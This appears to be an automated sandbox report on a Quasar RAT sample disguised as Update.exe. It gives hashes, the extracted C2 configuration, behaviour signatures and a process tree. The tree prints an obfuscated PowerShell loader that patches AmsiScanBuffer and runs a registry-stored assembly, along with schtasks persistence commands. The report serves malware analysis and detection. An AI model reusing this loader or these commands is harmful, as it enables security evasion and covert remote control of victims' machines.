Analysis

  • max time kernel
    145s
  • max time network
    146s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    21-04-2024 17:18

General

  • Target

    Update.exe

  • Size

    409KB

  • MD5

    93cd801b9e5e90edab480d3c1c135271

  • SHA1

    b0c7e918ade7a47916603ebd9eb1e3b4d78062c2

  • SHA256

    89996d761395b9e79589c4c7c93cc21ae2b5a00a9ba8c46abbf395954f3d0133

  • SHA512

    a5e207744fcb100fb24935ecda4c4214ac4cc7aca666b589fa1c451f1ad24c5a573cfe1b8150ac5510a866bb800251aa6ebf3fd685ed7a2e5fbc482791e143ed

  • SSDEEP

    6144:0rBUymyfpwzeiqv6Ef3RB17bdzjyue7zKINbuz2vcDJ8vtVQY:eBwz9/Ef3RB17FyuYKIQXDJ8vtCY

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SLAVE

C2

147.185.221.19:33587

Mutex

$Sxr-zpFqsQjJJh3miBvVnu

Attributes
  • encryption_key

    w1TSUMSbvOFQ9whpYTwH

  • install_name

    BiosUpdX64YDPS.exe

  • log_directory

    $sxr

  • reconnect_delay

    3000

  • startup_key

    $sxr-mtsha

  • subdirectory

    Windows

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 9 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 60 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:584
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:992
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{bb273626-295c-4e4e-8bbe-91d9139f01df}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4328
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:640
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
        1⤵
          PID:740
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
          1⤵
            PID:904
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
            1⤵
              PID:368
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
              1⤵
                PID:372
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
                1⤵
                  PID:592
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
                  1⤵
                    PID:1096
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                      PID:1108
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:AhJxZWUIZAdN{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZZKyMIrGwCvnoY,[Parameter(Position=1)][Type]$vjBpDaCQay)$adICBwDuISy=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+'f'+''+'l'+''+'e'+'ct'+[Char](101)+''+'d'+'D'+'e'+'l'+[Char](101)+'g'+'a'+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'Me'+'m'+''+[Char](111)+'ry'+[Char](77)+''+[Char](111)+'d'+'u'+'l'+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'De'+[Char](108)+''+[Char](101)+''+'g'+'a'+[Char](116)+''+[Char](101)+''+'T'+''+'y'+'p'+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+'ss,P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+'e'+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+'la'+[Char](115)+'s'+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$adICBwDuISy.DefineConstructor('R'+'T'+''+'S'+''+[Char](112)+'ec'+'i'+'al'+'N'+''+[Char](97)+''+[Char](109)+'e'+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+'S'+'i'+''+'g'+''+','+''+[Char](80)+'u'+'b'+'li'+'c'+'',[Reflection.CallingConventions]::Standard,$ZZKyMIrGwCvnoY).SetImplementationFlags('Run'+'t'+''+[Char](105)+''+'m'+'e'+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$adICBwDuISy.DefineMethod('I'+'n'+'v'+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+'g'+''+[Char](44)+'N'+'e'+''+[Char](119)+'Sl'+[Char](111)+''+'t'+''+','+'Vir'+[Char](116)+''+'u'+''+[Char](97)+'l',$vjBpDaCQay,$ZZKyMIrGwCvnoY).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+'im'+'e'+',M'+[Char](97)+''+'n'+''+[Char](97)+'g'+'e'+''+[Char](100)+'');Write-Output $adICBwDuISy.CreateType();}$kwtNgqYrnikWc=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+''+'i'+''+[Char](99)+'r'+[Char](111)+''+'s'+'o'+'f'+''+[Char](116)+''+[Char](46)+''+'W'+'i'+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+''+'n'+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+'N'+[Char](97)+''+[Char](116)+''+'i'+''+[Char](118)+'eMet'+[Char](104)+''+[Char](111)+''+'d'+'s');$beXfVhIkqxbkYQ=$kwtNgqYrnikWc.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'P'+'r'+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+'r'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+','+'S'+''+'t'+'a'+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$MejXkWppwGpJgAKPKQL=AhJxZWUIZAdN @([String])([IntPtr]);$HatMvqJZiwVUNuGAGMoOBt=AhJxZWUIZAdN @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$CbDmOKLfqQf=$kwtNgqYrnikWc.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'M'+''+'o'+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+''+[Char](72)+'an'+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+[Char](110)+'el3'+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$tfnyVAgwojfycY=$beXfVhIkqxbkYQ.Invoke($Null,@([Object]$CbDmOKLfqQf,[Object](''+[Char](76)+'o'+'a'+''+'d'+''+[Char](76)+''+'i'+''+[Char](98)+''+'r'+'ary'+'A'+'')));$kyAAehVuXrSpUZzJA=$beXfVhIkqxbkYQ.Invoke($Null,@([Object]$CbDmOKLfqQf,[Object](''+'V'+''+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+'r'+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$KOBUUrA=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tfnyVAgwojfycY,$MejXkWppwGpJgAKPKQL).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'');$JLwvahADLawqFFCWI=$beXfVhIkqxbkYQ.Invoke($Null,@([Object]$KOBUUrA,[Object](''+'A'+''+[Char](109)+''+'s'+''+[Char](105)+''+'S'+''+[Char](99)+'a'+'n'+''+[Char](66)+''+[Char](117)+'f'+'f'+''+[Char](101)+''+[Char](114)+'')));$yujjdgZZbs=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kyAAehVuXrSpUZzJA,$HatMvqJZiwVUNuGAGMoOBt).Invoke($JLwvahADLawqFFCWI,[uint32]8,4,[ref]$yujjdgZZbs);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$JLwvahADLawqFFCWI,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kyAAehVuXrSpUZzJA,$HatMvqJZiwVUNuGAGMoOBt).Invoke($JLwvahADLawqFFCWI,[uint32]8,0x20,[ref]$yujjdgZZbs);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+'s'+''+'t'+''+'a'+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:4588
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1184
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k localservice -s nsi
                        1⤵
                          PID:1216
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k localservice -s EventSystem
                          1⤵
                            PID:1236
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s Themes
                            1⤵
                              PID:1252
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
                              1⤵
                                PID:1396
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                1⤵
                                  PID:1428
                                  • \??\c:\windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                      PID:2408
                                    • \??\c:\windows\system32\sihost.exe
                                      sihost.exe
                                      2⤵
                                        PID:1812
                                      • \??\c:\windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                          PID:2160
                                        • \??\c:\windows\system32\sihost.exe
                                          sihost.exe
                                          2⤵
                                            PID:2980
                                          • \??\c:\windows\system32\sihost.exe
                                            sihost.exe
                                            2⤵
                                              PID:1956
                                            • \??\c:\windows\system32\sihost.exe
                                              sihost.exe
                                              2⤵
                                                PID:3760
                                            • c:\windows\system32\svchost.exe
                                              c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                              1⤵
                                                PID:1472
                                              • c:\windows\system32\svchost.exe
                                                c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
                                                1⤵
                                                  PID:1540
                                                • c:\windows\system32\svchost.exe
                                                  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
                                                  1⤵
                                                    PID:1580
                                                  • c:\windows\system32\svchost.exe
                                                    c:\windows\system32\svchost.exe -k networkservice -s Dnscache
                                                    1⤵
                                                      PID:1600
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                      1⤵
                                                        PID:1680
                                                      • c:\windows\system32\svchost.exe
                                                        c:\windows\system32\svchost.exe -k localservice -s netprofm
                                                        1⤵
                                                          PID:1720
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                          1⤵
                                                            PID:1756
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
                                                            1⤵
                                                              PID:1772
                                                            • c:\windows\system32\svchost.exe
                                                              c:\windows\system32\svchost.exe -k appmodel -s StateRepository
                                                              1⤵
                                                                PID:1848
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                1⤵
                                                                  PID:1856
                                                                • C:\Windows\System32\spoolsv.exe
                                                                  C:\Windows\System32\spoolsv.exe
                                                                  1⤵
                                                                    PID:1940
                                                                  • c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
                                                                    1⤵
                                                                      PID:1992
                                                                    • c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                      1⤵
                                                                        PID:2144
                                                                      • c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
                                                                        1⤵
                                                                          PID:2236
                                                                        • c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                          1⤵
                                                                            PID:2472
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                            1⤵
                                                                              PID:2492
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
                                                                              1⤵
                                                                                PID:2588
                                                                              • c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
                                                                                1⤵
                                                                                  PID:2660
                                                                                • c:\windows\system32\svchost.exe
                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                  1⤵
                                                                                    PID:2700
                                                                                  • c:\windows\system32\svchost.exe
                                                                                    c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
                                                                                    1⤵
                                                                                      PID:2732
                                                                                    • C:\Windows\sysmon.exe
                                                                                      C:\Windows\sysmon.exe
                                                                                      1⤵
                                                                                        PID:2744
                                                                                      • c:\windows\system32\svchost.exe
                                                                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
                                                                                        1⤵
                                                                                          PID:2772
                                                                                        • c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                                          1⤵
                                                                                            PID:2788
                                                                                          • C:\Windows\system32\wbem\unsecapp.exe
                                                                                            C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                            1⤵
                                                                                              PID:3024
                                                                                            • c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
                                                                                              1⤵
                                                                                                PID:2960
                                                                                              • c:\windows\system32\svchost.exe
                                                                                                c:\windows\system32\svchost.exe -k localservice -s CDPSvc
                                                                                                1⤵
                                                                                                  PID:4700
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                  1⤵
                                                                                                    PID:3712
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
                                                                                                    1⤵
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:1832
                                                                                                  • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                    "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                    1⤵
                                                                                                    • Drops file in System32 directory
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:876
                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                                    1⤵
                                                                                                      PID:2684
                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                      1⤵
                                                                                                        PID:2896
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Update.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Update.exe"
                                                                                                        1⤵
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:2452
                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                          "schtasks" /create /tn "$sxr-mtsha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Update.exe" /rl HIGHEST /f
                                                                                                          2⤵
                                                                                                          • Creates scheduled task(s)
                                                                                                          PID:4260
                                                                                                        • C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe"
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:3704
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            "schtasks" /create /tn "$sxr-mtsha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe" /rl HIGHEST /f
                                                                                                            3⤵
                                                                                                            • Creates scheduled task(s)
                                                                                                            PID:4432
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:3124
                                                                                                        • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                                          "SCHTASKS.exe" /create /tn "$77Update.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Update.exe'" /sc onlogon /rl HIGHEST
                                                                                                          2⤵
                                                                                                          • Creates scheduled task(s)
                                                                                                          PID:2344
                                                                                                      • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                        C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                        1⤵
                                                                                                          PID:2512
                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                          C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                          1⤵
                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          PID:4552
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                                          1⤵
                                                                                                            PID:3080
                                                                                                          • C:\Windows\System32\smss.exe
                                                                                                            \SystemRoot\System32\smss.exe 000000b4 00000080
                                                                                                            1⤵
                                                                                                              PID:3588
                                                                                                            • C:\Windows\System32\smss.exe
                                                                                                              \SystemRoot\System32\smss.exe 000000ec 00000080
                                                                                                              1⤵
                                                                                                                PID:2740
                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                1⤵
                                                                                                                • Drops file in System32 directory
                                                                                                                • Drops file in Windows directory
                                                                                                                PID:2012
                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 2012 -s 712
                                                                                                                  2⤵
                                                                                                                    PID:3500
                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 3500 -s 596
                                                                                                                      3⤵
                                                                                                                        PID:5040

                                                                                                                  Network

                                                                                                                  MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                  Execution

                                                                                                                  Scheduled Task/Job

                                                                                                                  1
                                                                                                                  T1053

                                                                                                                  Persistence

                                                                                                                  Scheduled Task/Job

                                                                                                                  1
                                                                                                                  T1053

                                                                                                                  Privilege Escalation

                                                                                                                  Scheduled Task/Job

                                                                                                                  1
                                                                                                                  T1053

                                                                                                                  Command and Control

                                                                                                                  Web Service

                                                                                                                  1
                                                                                                                  T1102

                                                                                                                  Replay Monitor

                                                                                                                  Loading Replay Monitor...

                                                                                                                  Downloads

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                                                                                                    Filesize

                                                                                                                    162KB

                                                                                                                    MD5

                                                                                                                    152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                                    SHA1

                                                                                                                    c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                                    SHA256

                                                                                                                    a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                                    SHA512

                                                                                                                    2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                                  • C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe
                                                                                                                    Filesize

                                                                                                                    409KB

                                                                                                                    MD5

                                                                                                                    93cd801b9e5e90edab480d3c1c135271

                                                                                                                    SHA1

                                                                                                                    b0c7e918ade7a47916603ebd9eb1e3b4d78062c2

                                                                                                                    SHA256

                                                                                                                    89996d761395b9e79589c4c7c93cc21ae2b5a00a9ba8c46abbf395954f3d0133

                                                                                                                    SHA512

                                                                                                                    a5e207744fcb100fb24935ecda4c4214ac4cc7aca666b589fa1c451f1ad24c5a573cfe1b8150ac5510a866bb800251aa6ebf3fd685ed7a2e5fbc482791e143ed

                                                                                                                  • C:\Windows\Temp\__PSScriptPolicyTest_d1dna5u5.3gv.ps1
                                                                                                                    Filesize

                                                                                                                    1B

                                                                                                                    MD5

                                                                                                                    c4ca4238a0b923820dcc509a6f75849b

                                                                                                                    SHA1

                                                                                                                    356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                                    SHA256

                                                                                                                    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                                    SHA512

                                                                                                                    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                                  • memory/584-113-0x00007FF9B4FC0000-0x00007FF9B4FD0000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/584-85-0x000001BA9DC30000-0x000001BA9DC5B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/584-76-0x000001BA9DC30000-0x000001BA9DC5B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/584-75-0x000001BA9DC30000-0x000001BA9DC5B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/584-91-0x00007FF9F4FD5000-0x00007FF9F4FD6000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/584-74-0x000001BA9DC00000-0x000001BA9DC25000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    148KB

                                                                                                                  • memory/584-114-0x000001BA9DC30000-0x000001BA9DC5B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/640-87-0x000002952BB00000-0x000002952BB2B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/640-105-0x00007FF9F4FD5000-0x00007FF9F4FD6000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/640-99-0x00007FF9B4FC0000-0x00007FF9B4FD0000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/640-98-0x000002952BB00000-0x000002952BB2B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/740-103-0x00000226AC250000-0x00000226AC27B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/740-125-0x00000226AC250000-0x00000226AC27B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/904-110-0x000001ED4B010000-0x000001ED4B03B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/2452-1-0x00000000734B0000-0x0000000073B9E000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    6.9MB

                                                                                                                  • memory/2452-2-0x0000000005EF0000-0x00000000063EE000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    5.0MB

                                                                                                                  • memory/2452-0-0x0000000000E40000-0x0000000000EAC000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    432KB

                                                                                                                  • memory/2452-3-0x00000000033E0000-0x0000000003472000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    584KB

                                                                                                                  • memory/2452-4-0x0000000005950000-0x0000000005960000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/2452-5-0x0000000005960000-0x00000000059C6000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    408KB

                                                                                                                  • memory/2452-6-0x0000000005E90000-0x0000000005EA2000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    72KB

                                                                                                                  • memory/2452-7-0x0000000006880000-0x00000000068BE000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    248KB

                                                                                                                  • memory/2452-20-0x00000000734B0000-0x0000000073B9E000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    6.9MB

                                                                                                                  • memory/3500-742-0x00007FF9F4F30000-0x00007FF9F510B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.9MB

                                                                                                                  • memory/3500-748-0x00007FF9F4F30000-0x00007FF9F510B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.9MB

                                                                                                                  • memory/3500-768-0x00007FF9F4F30000-0x00007FF9F510B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.9MB

                                                                                                                  • memory/3704-102-0x0000000004C60000-0x0000000004C70000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/3704-13-0x00000000734B0000-0x0000000073B9E000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    6.9MB

                                                                                                                  • memory/3704-555-0x00000000734B0000-0x0000000073B9E000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    6.9MB

                                                                                                                  • memory/3704-89-0x00000000734B0000-0x0000000073B9E000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    6.9MB

                                                                                                                  • memory/3704-22-0x0000000006130000-0x000000000613A000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    40KB

                                                                                                                  • memory/3704-14-0x0000000004C60000-0x0000000004C70000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/4328-55-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/4328-71-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/4328-56-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/4328-57-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/4328-59-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/4328-70-0x00007FF9F4AE0000-0x00007FF9F4B8E000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    696KB

                                                                                                                  • memory/4328-68-0x00007FF9F4F30000-0x00007FF9F510B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.9MB

                                                                                                                  • memory/4328-129-0x00007FF9F4F30000-0x00007FF9F510B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.9MB

                                                                                                                  • memory/4328-67-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    32KB
